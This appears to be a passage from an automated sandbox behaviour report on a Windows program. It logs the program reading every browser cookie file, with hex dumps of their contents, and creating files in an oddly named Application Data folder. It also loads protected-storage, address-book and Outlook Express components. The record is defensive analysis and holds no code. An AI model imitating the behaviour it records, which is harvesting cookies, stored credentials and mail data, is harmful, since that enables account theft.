C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt none 222 75 0A 34 64 64 61 36 36 61 37 30 64 38 61 62 0A 61 64 2E 77 73 6F 64 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 30 38 39 30 39 33 31 32 30 0A 33 30 31 35 39 32 38 30 0A 32 30 33 37 32 36 35 35 36 38 0A 33 30 31 35 33 30 34 32 0A 2A 0A 69 5F 31 0A 33 33 3A 39 36 37 3A 35 35 35 3A 30 3A 30 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt none 232 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 30 32 32 37 39 33 35 36 7C 73 65 73 73 69 6F 6E 23 31 33 30 32 32 37 39 32 34 30 39 31 38 2D 39 35 32 36 31 35 23 31 33 30 32 32 38 31 31 35 36 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 31 38 34 39 37 36 38 34 34 38 0A 33 30 31 34 34 30 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt none 232 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 32 31 30 31 31 39 36 32 7C 73 65 73 73 69 6F 6E 23 31 33 32 31 30 31 31 39 30 31 36 37 39 2D 32 31 30 36 33 34 23 31 33 32 31 30 31 33 37 36 32 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 32 39 31 31 31 35 33 34 30 38 0A 33 30 31 38 37 36 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt none 102 4D 55 49 44 0A 39 37 41 30 45 44 32 45 45 39 33 35 34 37 33 44 38 37 46 43 37 45 37 30 37 32 35 45 45 30 35 37 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 32 38 35 30 36 31 36 33 32 0A 33 30 31 38 34 33 38 33 0A 32 37 31 36 30 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt none 101 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 33 33 31 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt none 191 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 34 37 35 38 30 30 31 39 32 0A 33 30 31 39 33 32 37 33 0A 32 34 33 35 32 36 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt none 204 53 52 43 48 44 0A 4D 53 3D 31 37 38 33 35 38 30 26 44 3D 31 37 38 33 35 35 32 26 41 46 3D 4E 4F 46 4F 52 4D 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 38 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A 32 30 35 38 32 30 35 35 36 38 0A 33 30 31 35 33 30 34 32 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt none 291 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A 53 52 43 48 44 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt none 69 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 34 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt none 68 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 32 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 30 38 37 30 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt none 67 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 35 36 34 30 33 34 38 31 36 0A 33 30 31 34 34 37 35 34 0A 32 37 33 34 38 31 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt none 67 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 37 35 34 37 37 33 33 37 36 0A 33 30 31 35 33 36 34 34 0A 32 34 35 33 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt none 83 50 4F 50 55 50 43 48 45 43 4B 0A 31 33 30 32 33 36 35 36 33 31 36 36 38 0A 63 68 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 34 39 31 32 31 31 31 33 36 0A 33 30 31 34 34 32 30 39 0A 34 30 38 31 32 38 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt none 122 69 64 0A 63 38 32 63 64 65 37 33 37 30 30 30 30 65 31 7C 7C 74 3D 31 33 30 36 31 36 30 34 33 35 7C 65 74 3D 37 33 30 7C 63 73 3D 79 67 31 65 38 31 65 2D 0A 64 6F 75 62 6C 65 63 6C 69 63 6B 2E 6E 65 74 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 35 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt none 88 69 30 30 0A 30 31 37 62 34 64 61 30 32 33 39 36 65 62 35 31 30 30 30 36 0A 69 76 77 62 6F 78 2E 64 65 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 36 35 36 30 35 35 30 34 0A 33 30 32 31 37 35 37 36 0A 32 36 39 34 34 39 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt none 99 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 33 34 36 39 33 37 36 33 32 0A 33 30 31 34 34 30 30 38 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt none 100 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 32 35 34 31 33 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 64 34 62 32 32 37 62 34 35 61 38 36 34 61 63 39 38 65 33 36 61 39 34 63 64 61 39 64 64 36 35 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 34 30 34 34 37 31 34 39 32 38 0A 33 30 31 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 62 30 37 65 34 37 39 62 30 37 66 36 34 65 62 30 39 66 62 62 65 64 36 66 38 66 62 31 36 66 64 33 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 35 34 31 38 34 31 36 30 30 0A 33 30 31 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 39 35 61 30 63 63 36 61 31 63 39 38 34 39 64 33 61 65 30 32 31 35 37 34 31 33 62 35 38 65 36 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 31 37 31 30 34 34 37 35 32 0A 33 30 31 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt none 455 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 36 64 61 34 34 66 64 61 33 33 65 61 34 61 32 39 38 34 65 66 64 30 66 33 34 66 32 30 38 34 35 35 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 34 30 34 39 35 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt none 387 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 34 64 33 30 63 39 34 63 62 30 62 35 34 62 31 35 62 36 30 65 35 39 37 38 33 62 35 32 32 64 38 62 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 35 35 37 34 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt none 457 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 38 35 62 63 63 31 63 34 31 37 65 31 34 34 63 62 61 33 61 62 39 62 65 65 62 61 36 62 62 35 32 32 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 32 31 34 37 39 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt none 690 46 43 30 30 0A 46 42 3D 0A 72 61 64 2E 6D 73 6E 2E 63 6F 6D 2F 0A 39 32 31 36 0A 33 38 30 32 31 31 32 30 30 30 0A 33 30 32 39 39 38 37 35 0A 32 33 39 33 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A 46 43 30 31 0A 46 42 3D 0A 72 61 64 2E 6D 73 6E 2E 63 6F 6D 2F 0A 39 32 31 36 0A 33 38 30 32 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt none 115 55 49 44 0A 32 39 30 36 32 66 37 32 2D 39 35 2E 31 30 30 2E 32 34 39 2E 31 33 30 2D 31 33 30 32 33 34 30 35 30 36 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 34 30 31 38 39 36 37 30 34 0A 33 30 32 39 31 30 30 31 0A 32 36 36 30 35 39 31 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt none 113 55 49 44 0A 31 61 37 62 62 64 63 38 2D 32 31 32 2E 32 34 33 2E 31 35 32 2E 31 36 30 2D 31 33 30 32 32 37 39 32 33 30 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 37 37 32 35 32 37 33 36 0A 33 30 32 39 30 38 35 39 0A 33 32 37 37 31 37 36 33 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt none 112 55 49 44 0A 62 39 32 34 35 38 31 2D 36 35 2E 31 39 39 2E 36 33 2E 32 35 2D 31 33 30 36 31 35 38 37 34 37 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 33 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A 32 30 30 31 34 38 35 35 36 38 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt none 90 69 30 30 0A 37 35 34 39 34 64 39 66 33 34 33 64 32 64 62 36 30 30 30 31 0A 77 65 6D 66 62 6F 78 2E 63 68 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 38 31 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 38 30 36 35 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt none 111 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 34 45 46 44 37 36 44 38 33 37 43 33 34 42 31 43 39 37 44 44 42 30 38 41 36 44 46 37 30 44 45 43 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 35 33 36 0A 33 38 35 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 39 38 31 35 34 39 32 38 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt none 117 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 42 42 35 44 31 42 30 35 36 35 30 34 34 41 45 43 42 37 45 44 41 35 35 38 37 30 44 39 39 38 39 34 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 35 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp none 5 05 0D 8C 79 C9 end of file 1 1F8BD68
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei PositionInformation Offset: 0 success or wait 5 1F8AF59
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
none query and write and read commit 1820000 12288 own pid read write success or wait 1
none query and write and read commit 1820000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 29D0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 29D0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown 71A50000 258048 own pid read write object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit 1820000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit 1820000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
none query and write and read commit 1820000 12288 own pid read write success or wait 1
none query and write and read commit 19E0000 12288 own pid read write success or wait 1
\KnownDlls\RASAPI32.dll write and read and execute unknown 19E0000 12288 own pid read write object name not found 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown 76EE0000 245760 own pid read write object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown 76E90000 73728 own pid read write object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit 2A50000 184320 own pid readonly success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown 2A50000 184320 own pid readonly object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown 71E50000 86016 own pid read write object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown 78080000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown 722B0000 20480 own pid read write object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown 19D0000 4096 own pid readonly success or wait 1
\KnownDlls\digest.dll write and read and execute unknown 19D0000 4096 own pid readonly object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown 75B00000 86016 own pid read write object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown 747B0000 290816 own pid read write object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
none query and write and read commit 2AD0000 12288 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown 2AD0000 12288 own pid read write object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit 2A90000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit 2A90000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
\KnownDlls\cryptdll.dll write and read and execute unknown 77C70000 151552 own pid read write object name not found 1
C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_IETldCache_index.dat_262144 write unknown 76790000 49152 own pid read write object name not found 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_IETldCache_index.dat_262144 query and write and read commit 2A90000 262144 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown 2A90000 262144 own pid read write object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
none query and write and read commit 2B10000 12288 own pid read write success or wait 1
none query and write and read commit 2B50000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B50000 208896 own pid readonly success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B50000 208896 own pid readonly success or wait 1
\KnownDlls\rsaenh.dll write and read and execute unknown 2B50000 208896 own pid readonly object name not found 1
C:\WINDOWS\system32\rsaenh.dll query and write and read and execute image 68000000 221184 own pid read write success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B50000 208896 own pid readonly success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit 2B50000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit 2B50000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll query and write and read and execute image 68810000 270336 own pid read write success or wait 1
\KnownDlls\MSOERT2.dll write and read and execute unknown 68810000 270336 own pid read write object name not found 1
C:\WINDOWS\system32\msoert2.dll query and write and read and execute image 76880000 139264 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 2B60000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 2B60000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 2B60000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 2B80000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 2B80000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 2B80000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit 2B80000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit 2B80000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll query and write and read and execute image 71780000 73728 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 2BA0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 2BA0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll query and write and read and execute image 470D0000 528384 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 2BA0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 2BA0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll query and write and read and execute image 35F40000 258048 own pid read write success or wait 1
none query and write and read commit 2B80000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\msident.dll write and read and execute commit 2B80000 53248 own pid execute success or wait 1
C:\WINDOWS\system32\msident.dll write and read and execute commit 2B80000 53248 own pid execute success or wait 1
C:\WINDOWS\system32\msident.dll query and write and read and execute image 608A0000 61440 own pid read write success or wait 1
C:\WINDOWS\system32\msident.dll read commit 2B80000 53248 own pid readonly success or wait 1
C:\WINDOWS\system32\msidntld.dll write and read and execute commit 2B80000 16384 own pid execute success or wait 1
C:\WINDOWS\system32\msidntld.dll write and read and execute commit 2B80000 16384 own pid execute success or wait 1
C:\WINDOWS\system32\msidntld.dll query and write and read and execute image 60890000 24576 own pid read write success or wait 1
none query and write and read commit 2BE0000 12288 own pid read write success or wait 1
\KnownDlls\PSTOREC.DLL write and read and execute unknown 2BE0000 12288 own pid read write object name not found 1
C:\WINDOWS\system32\pstorec.dll query and write and read and execute image 5E0C0000 53248 own pid read write success or wait 1
C:\Program Files\Outlook Express\msoe.dll write and read and execute commit 2C70000 1318912 own pid execute success or wait 1
C:\Program Files\Outlook Express\msoe.dll write and read and execute commit 2C70000 1318912 own pid execute success or wait 1
C:\Program Files\Outlook Express\msoe.dll query and write and read and execute image 60330000 1347584 own pid read write success or wait 1
\KnownDlls\INETCOMM.dll write and read and execute unknown 60330000 1347584 own pid read write object name not found 1
C:\WINDOWS\system32\inetcomm.dll query and write and read and execute image 76150000 712704 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 2BE0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 2BE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 2BE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\inetres.dll write and read and execute commit 2BF0000 49152 own pid execute success or wait 1
C:\WINDOWS\system32\inetres.dll write and read and execute commit 2BE0000 49152 own pid execute success or wait 1
C:\WINDOWS\system32\inetres.dll query and write and read and execute image 2BF0000 57344 own pid read write conflicting addresses 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 2C70000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 2C70000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 2C70000 4096 own pid readonly success or wait 1
C:\Program Files\Outlook Express\msoeres.dll write and read and execute commit 2C90000 2482176 own pid execute success or wait 1
C:\Program Files\Outlook Express\msoeres.dll write and read and execute commit 2C90000 2482176 own pid execute success or wait 1
C:\Program Files\Outlook Express\msoeres.dll query and write and read and execute image 2C90000 2486272 own pid read write conflicting addresses 1
C:\Program Files\Common Files\System\directdb.dll write and read and execute commit 2EF0000 90112 own pid execute success or wait 1
C:\Program Files\Common Files\System\directdb.dll write and read and execute commit 2EF0000 90112 own pid execute success or wait 1
C:\Program Files\Common Files\System\directdb.dll query and write and read and execute image 6CDF0000 102400 own pid read write success or wait 1
\BaseNamedObjects\microsoft_thor_folder_notifyinfo_mappedfile query and write and read commit 2C70000 4096 own pid read write success or wait 1
none query and write and read commit 2F30000 12288 own pid read write success or wait 1
\NLS\NlsSectionCP20127 read unknown 2F30000 69632 own pid readonly success or wait 1
none query and write and read commit 2FC0000 12288 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbshare query and write and read and execute and extend size unknown 2FC0000 12288 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbshare query and write and read commit 2FC0000 28672 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap query and write and read and execute and extend size unknown 2FC0000 28672 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap query and write and read commit 2FD0000 12288 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap query and write and read and execute and extend size unknown 2FD0000 12288 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap query and write and read commit 2FE0000 77824 own pid read write success or wait 1
